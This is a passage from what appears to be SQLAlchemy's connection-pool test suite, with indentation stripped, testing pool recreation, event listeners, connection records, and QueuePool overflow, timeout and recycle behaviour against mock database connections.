p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.info)
c.invalidate()
c = p.connect()
self.assert_("foo" not in c.info)
c.info["foo2"] = "bar2"
c.detach()
self.assert_("foo2" in c.info)
c2 = p.connect()
is_not(c.dbapi_connection, c2.dbapi_connection)
assert not c2.info
assert "foo2" in c.info
def test_rec_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.record_info)
self.assert_(c.record_info is c._connection_record.record_info)
c.record_info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.record_info)
c.invalidate()
c = p.connect()
self.assert_("foo" in c.record_info)
c.record_info["foo2"] = "bar2"
c.detach()
is_(c.record_info, None)
is_(c._connection_record, None)
c2 = p.connect()
assert c2.record_info
assert "foo2" in c2.record_info
def test_rec_unconnected(self):
# test production of a _ConnectionRecord with an
# initially unconnected state.
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1, connect=False)
assert not r1.dbapi_connection
c1 = r1.get_connection()
is_(c1, r1.dbapi_connection)
is_(c1, r1.connection)
is_(c1, r1.driver_connection)
def test_rec_close_reopen(self):
# test that _ConnectionRecord.close() allows
# the record to be reusable
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1)
c1 = r1.dbapi_connection
c2 = r1.get_connection()
is_(c1, c2)
r1.close()
assert not r1.dbapi_connection
eq_(c1.mock_calls, [call.close()])
c2 = r1.get_connection()
is_not(c1, c2)
is_(c2, r1.dbapi_connection)
eq_(c2.mock_calls, [])
@testing.combinations(
(
pool.QueuePool,
dict(pool_size=8, max_overflow=10, timeout=25, use_lifo=True),
),
(pool.QueuePool, {}),
(pool.NullPool, {}),
(pool.SingletonThreadPool, {}),
(pool.StaticPool, {}),
(pool.AssertionPool, {}),
)
def test_recreate_state(self, pool_cls, pool_args):
creator = object()
pool_args["pre_ping"] = True
pool_args["reset_on_return"] = "commit"
pool_args["recycle"] = 35
pool_args["logging_name"] = "somepool"
pool_args["dialect"] = default.DefaultDialect()
pool_args["echo"] = "debug"
p1 = pool_cls(creator=creator, **pool_args)
cls_keys = dir(pool_cls)
d1 = dict(p1.__dict__)
p2 = p1.recreate()
d2 = dict(p2.__dict__)
for k in cls_keys:
d1.pop(k, None)
d2.pop(k, None)
for k in (
"_invoke_creator",
"_pool",
"_overflow_lock",
"_fairy",
"_conn",
"logger",
):
if k in d2:
d2[k] = mock.ANY
eq_(d1, d2)
eq_(p1.echo, p2.echo)
is_(p1._dialect, p2._dialect)
if "use_lifo" in pool_args:
eq_(p1._pool.use_lifo, p2._pool.use_lifo)
@testing.combinations(
(pool.QueuePool, False),
(pool.AsyncAdaptedQueuePool, True),
(pool.FallbackAsyncAdaptedQueuePool, True),
(pool.NullPool, None),
(pool.SingletonThreadPool, False),
(pool.StaticPool, None),
(pool.AssertionPool, None),
)
def test_is_asyncio_from_dialect(self, pool_cls, is_async_kind):
p = pool_cls(creator=object())
for is_async in (True, False):
if is_async:
p._dialect = _AsyncConnDialect()
else:
p._dialect = _ConnDialect()
if is_async_kind is None:
eq_(p._is_asyncio, is_async)
else:
eq_(p._is_asyncio, is_async_kind)
@testing.combinations(
(pool.QueuePool, False),
(pool.AsyncAdaptedQueuePool, True),
(pool.FallbackAsyncAdaptedQueuePool, True),
(pool.NullPool, False),
(pool.SingletonThreadPool, False),
(pool.StaticPool, False),
(pool.AssertionPool, False),
)
def test_is_asyncio_from_dialect_cls(self, pool_cls, is_async):
eq_(pool_cls._is_asyncio, is_async)
def test_rec_fairy_default_dialect(self):
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
rec = pool._ConnectionRecord(p1)
is_not_none(rec.dbapi_connection)
is_(rec.connection, rec.dbapi_connection)
is_(rec.driver_connection, rec.dbapi_connection)
fairy = pool._ConnectionFairy(rec.dbapi_connection, rec, False)
is_not_none(fairy.dbapi_connection)
is_(fairy.connection, fairy.dbapi_connection)
is_(fairy.driver_connection, fairy.dbapi_connection)
is_(fairy.dbapi_connection, rec.dbapi_connection)
is_(fairy.driver_connection, rec.driver_connection)
def test_rec_fairy_adapted_dialect(self):
dbapi = MockDBAPI()
mock_dc = object()
class _AdaptedDialect(_ConnDialect):
def get_driver_connection(self, connection):
return mock_dc
p1 = pool.Pool(
creator=lambda: dbapi.connect("foo.db"), dialect=_AdaptedDialect()
)
rec = pool._ConnectionRecord(p1)
is_not_none(rec.dbapi_connection)
is_(rec.connection, rec.dbapi_connection)
is_(rec.driver_connection, mock_dc)
fairy = pool._ConnectionFairy(rec.dbapi_connection, rec, False)
is_not_none(fairy.dbapi_connection)
is_(fairy.connection, fairy.dbapi_connection)
is_(fairy.driver_connection, mock_dc)
is_(fairy.dbapi_connection, rec.dbapi_connection)
is_(fairy.driver_connection, mock_dc)
def test_connection_setter(self):
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
rec = pool._ConnectionRecord(p1)
is_not_none(rec.dbapi_connection)
is_(rec.connection, rec.dbapi_connection)
rec.connection = 42
is_(rec.connection, rec.dbapi_connection)
rec.dbapi_connection = 99
is_(rec.connection, rec.dbapi_connection)
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
is_async = False
def do_rollback(self, dbapi_connection):
canary.append("R")
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append("C")
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append("CL")
dbapi_connection.close()
def get_driver_connection(self, connection):
return connection
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ["R", "CL", "R"])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ["R", "CL", "R"])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ["R", "CL", "R"])
def test_null_pool(self):
self._do_test(pool.NullPool, ["R", "CL", "R", "CL"])
def test_static_pool(self):
self._do_test(pool.StaticPool, ["R", "CL", "R"])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append("first_connect")
event.listen(p, "first_connect", first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append("connect")
event.listen(p, "connect", connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append("checkout")
event.listen(p, "checkout", checkout)
return p, canary
def _checkin_event_fixture(self, _is_asyncio=False):
p = self._queuepool_fixture(_is_asyncio=_is_asyncio)
canary = []
@event.listens_for(p, "checkin")
def checkin(*arg, **kw):
canary.append("checkin")
@event.listens_for(p, "close_detached")
def close_detached(*arg, **kw):
canary.append("close_detached")
@event.listens_for(p, "detach")
def detach(*arg, **kw):
canary.append("detach")
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append("reset")
event.listen(p, "reset", reset)
return p, canary
def _invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "invalidate", canary)
return p, canary
def _soft_invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "soft_invalidate", canary)
return p, canary
def _close_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close", canary)
return p, canary
def _detach_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "detach", canary)
return p, canary
def _close_detached_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close_detached", canary)
return p, canary
def test_close(self):
p, canary = self._close_event_fixture()
c1 = p.connect()
connection = c1.dbapi_connection
rec = c1._connection_record
c1.close()
eq_(canary.mock_calls, [])
p.dispose()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach(self):
p, canary = self._detach_event_fixture()
c1 = p.connect()
connection = c1.dbapi_connection
rec = c1._connection_record
c1.detach()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach_close(self):
p, canary = self._close_detached_event_fixture()
c1 = p.connect()
connection = c1.dbapi_connection
c1.detach()
c1.close()
eq_(canary.mock_calls, [call(connection)])
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
p.connect()
eq_(canary, ["connect"])
def test_connect_insert_event(self):
p = self._queuepool_fixture()
canary = []
def connect_one(*arg, **kw):
canary.append("connect_one")
def connect_two(*arg, **kw):
canary.append("connect_two")
def connect_three(*arg, **kw):
canary.append("connect_three")
event.listen(p, "connect", connect_one)
event.listen(p, "connect", connect_two, insert=True)
event.listen(p, "connect", connect_three)
p.connect()
eq_(canary, ["connect_two", "connect_one", "connect_three"])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect() # noqa
c2 = p.connect() # noqa
eq_(canary, ["connect", "connect"])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
p.connect()
eq_(canary, ["checkout"])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
p.connect()
p.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["reset"])
def test_soft_invalidate_event_no_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.dbapi_connection
c1.invalidate(soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_soft_invalidate_event_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.dbapi_connection
exc = Exception("hi")
c1.invalidate(exc, soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_invalidate_event_no_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.dbapi_connection
c1.invalidate()
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_invalidate_event_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.dbapi_connection
exc = Exception("hi")
c1.invalidate(exc)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
@testing.combinations((True,), (False,))
def test_checkin_event_gc(self, detach_gced):
p, canary = self._checkin_event_fixture(_is_asyncio=detach_gced)
c1 = p.connect()
dbapi_connection = weakref.ref(c1.dbapi_connection)
eq_(canary, [])
del c1
lazy_gc()
if detach_gced:
# "close_detached" is not called because for asyncio the
# connection is just lost.
eq_(canary, ["detach"])
else:
eq_(canary, ["checkin"])
gc_collect()
if detach_gced:
is_none(dbapi_connection())
else:
is_not_none(dbapi_connection())
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
c2.close()
eq_(canary, ["checkin", "checkin"])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, "connect", listen_one)
event.listen(engine.pool, "connect", listen_two)
event.listen(engine, "connect", listen_three)
event.listen(engine.__class__, "connect", listen_four)
with engine.connect() as conn:
conn.execute(select(1))
eq_(
canary, ["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to
that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, "connect", listen_one)
event.listen(pool.QueuePool, "connect", listen_two)
event.listen(pool.SingletonThreadPool, "connect", listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def test_connect_event_fails_invalidates(self):
fail = False
def listen_one(conn, rec):
if fail:
raise Exception("it failed")
def listen_two(conn, rec):
rec.info["important_flag"] = True
p1 = pool.QueuePool(
creator=MockDBAPI().connect, pool_size=1, max_overflow=0
)
event.listen(p1, "connect", listen_one)
event.listen(p1, "connect", listen_two)
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.invalidate()
conn.close()
fail = True
assert_raises(Exception, p1.connect)
fail = False
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.close()
def teardown_test(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class PoolFirstConnectSyncTest(PoolTestBase):
"""test for :ticket:`2964`, where the pool would not mutex the
initialization of the dialect.
Unfortunately, as discussed in :ticket:`6337`, this test suite did not
ensure that the ``Engine`` itself actually uses the "first_connect" event,
so when :ticket:`5497` came along, the "first_connect" event was no longer
used and no test detected the re-introduction of the exact same race
condition, which was now worse as the un-initialized dialect would now
pollute the SQL cache causing the application to not work at all.
A new suite has therefore been added in test/engine/test_execute.py->
OnConnectTest::test_initialize_connect_race to ensure that the engine
in total synchronizes the "first_connect" process, which now works
using a new events feature _exec_w_sync_on_first_run.
"""
@testing.requires.timing_intensive
def test_sync(self):
pool = self._queuepool_fixture(pool_size=3, max_overflow=0)
evt = Mock()
@event.listens_for(pool, "first_connect")
def slow_first_connect(dbapi_con, rec):
time.sleep(1)
evt.first_connect()
@event.listens_for(pool, "connect")
def on_connect(dbapi_con, rec):
evt.connect()
def checkout():
for j in range(2):
c1 = pool.connect()
time.sleep(0.02)
c1.close()
time.sleep(0.02)
threads = []
# what we're trying to do here is have concurrent use of
# all three pooled connections at once, and the thing we want
# to test is that first_connect() finishes completely before
# any of the connections get returned. so first_connect()
# sleeps for one second, then pings the mock. the threads should
# not have made it to the "checkout() event for that one second.
for i in range(5):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
# there is a very unlikely condition observed in CI on windows
# where even though we have five threads above all calling upon the
# pool, we didn't get concurrent use of all three connections, two
# connections were enough. so here we purposely just check out
# all three at once just to get a consistent test result.
make_sure_all_three_are_connected = [pool.connect() for i in range(3)]
for conn in make_sure_all_three_are_connected:
conn.close()
eq_(
evt.mock_calls,
[
call.first_connect(),
call.connect(),
call.connect(),
call.connect(),
],
)
class QueuePoolTest(PoolTestBase):
def test_queuepool_del(self):
self._do_testqueuepool(useclose=False)
def test_queuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1)
def status(pool):
return (
pool.size(),
pool.checkedin(),
pool.overflow(),
pool.checkedout(),
)
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
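# status() is (size, checkedin, overflow, checkedout); QueuePool's overflow
# counter starts at -pool_size and rises by one per checkout, so a single
# checkout on this size-3 pool reads as overflow == -2.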
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
eq_(status(p), (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
def test_timeout_accessor(self):
expected_timeout = 123
p = self._queuepool_fixture(timeout=expected_timeout)
eq_(p.timeout(), expected_timeout)
@testing.requires.timing_intensive
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=0, timeout=2)
c1 = p.connect() # noqa
c2 = p.connect() # noqa
c3 = p.connect() # noqa
now = time.time()
assert_raises(tsa.exc.TimeoutError, p.connect)
assert int(time.time() - now) == 2
@testing.requires.timing_intensive
def test_timeout_subsecond_precision(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0, timeout=0.5)
c1 = p.connect() # noqa
with expect_raises(tsa.exc.TimeoutError):
now = time.time()
c2 = p.connect() # noqa
# Python timing is not very accurate, the time diff should be very
# close to 0.5s but we give 200ms of slack.
assert 0.3 <= time.time() - now <= 0.7, "Pool timeout not respected"
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=0.05),
pool_size=2,
max_overflow=1,
timeout=3,
)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should be under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
reaper = testing.engines.ConnectionKiller()
dbapi = MockDBAPI()
mutex = threading.Lock()
def creator():
time.sleep(0.05)
with mutex:
return dbapi.connect()
p = pool.QueuePool(
creator=creator, pool_size=3, timeout=2, max_overflow=max_overflow
)
reaper.add_pool(p)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(0.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
reaper.assert_all_closed()
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = self._with_teardown(p.connect()) # noqa
c2 = self._with_teardown(p.connect()) # noqa
c3 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(target=run_test, args=("success_one", p, False)),
threading.Thread(target=run_test, args=("success_two", p, False)),
threading.Thread(target=run_test, args=("overflow_one", p, True)),
threading.Thread(target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False)
),
]
for t in threads:
t.start()
time.sleep(0.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[
call("success_one"),
call("success_two"),
call("overflow_two"),
call("overflow_three"),
call("overflow_one"),
],
)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
with mutex:
return dbapi.connect()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(
creator=creator,
pool_size=2,
timeout=timeout,
max_overflow=max_overflow,
)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(0.1)
conn.close()
c1 = p.connect() # noqa
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(
target=waiter, args=(p, timeout, max_overflow)
)
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(0.2)
p._invalidate(c2)
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
def test_connrec_invalidated_within_checkout_no_race(self):
"""Test that a concurrent ConnectionRecord.invalidate() which
occurs after the ConnectionFairy has called
_ConnectionRecord.checkout()
but before the ConnectionFairy tests "fairy.dbapi_connection is None"
will not result in an InvalidRequestError.
This use case assumes that a listener on the checkout() event
will be raising DisconnectionError so that a reconnect attempt
may occur.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator, pool_size=1, max_overflow=0)
conn = p.connect()
conn.close()
_existing_checkout = pool._ConnectionRecord.checkout
@classmethod
def _decorate_existing_checkout(cls, *arg, **kw):
fairy = _existing_checkout(*arg, **kw)
connrec = fairy._connection_record
connrec.invalidate()
return fairy
with patch(
"sqlalchemy.pool._ConnectionRecord.checkout",
_decorate_existing_checkout,
):
conn = p.connect()
is_(conn._connection_record.dbapi_connection, None)
conn.close()
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator():
canary.append(1)
return dbapi.connect()
p1 = pool.QueuePool(
creator=creator, pool_size=1, timeout=None, max_overflow=0
)
def waiter(p):
conn = p.connect()
canary.append(2)
time.sleep(0.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1,))
t.start()
threads.append(t)
time.sleep(0.5)
eq_(canary, [1])
# this also calls invalidate()
# on c1
p1._invalidate(c1)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=dbapi.connect, pool_size=2, timeout=None, max_overflow=0
)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.dbapi_connection
c2_con = c2.dbapi_connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.dbapi_connection is c2_con
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_overflow_no_gc(self):
p = self._queuepool_fixture(pool_size=2, max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.dbapi_connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0]),
)
def test_recycle(self):
with patch("sqlalchemy.pool.base.time.time") as mock:
mock.return_value = 10000
p = self._queuepool_fixture(
pool_size=1, max_overflow=0, recycle=30
)
c1 = p.connect()
c_ref = weakref.ref(c1.dbapi_connection)
c1.close()
mock.return_value = 10001
c2 = p.connect()
is_(c2.dbapi_connection, c_ref())
c2.close()
mock.return_value = 10035
c3 = p.connect()
is_not(c3.dbapi_connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.dbapi_connection)
c1.close()
c2 = p.connect()
is_(c2.dbapi_connection, c_ref())
c2_rec = c2._connection_record
p._invalidate(c2)
assert c2_rec.dbapi_connection is None
c2.close()
time.sleep(0.5)
c3 = p.connect()
is_not(c3.dbapi_connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_soft_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.dbapi_connection)
c1.close()
c2 = p.connect()
is_(c2.dbapi_connection, c_ref())
c2_rec = c2._connection_record
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
c2.invalidate(soft=True)
is_(c2_rec.dbapi_connection, c2.dbapi_connection)
c2.close()
c3 = p.connect()
is_not(c3.dbapi_connection, c_ref())
is_(c3._connection_record, c2_rec)
is_(c2_rec.dbapi_connection, c3.dbapi_connection)
def _no_wr_finalize(self):
finalize_fairy = pool._finalize_fairy
def assert_no_wr_callback(
connection, connection_record, pool, ref, echo, fairy=None
):
if fairy is None:
raise AssertionError(
"finalize fairy was called as a weakref callback"
)
return finalize_fairy(
connection, connection_record, pool, ref, echo, fairy
)
return patch.object(pool, "_finalize_fairy", assert_no_wr_callback)
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
with self._no_wr_finalize():
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises_context_ok(Exception, p.connect)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = self._with_teardown(p.connect()) # noqa
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = self._with_teardown(p.connect())
c3.close()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, recycle=1
)
c1 = p.connect()
c1.close()
time.sleep(1.5)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_connect_handler_not_called_for_recycled(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
canary = Mock()
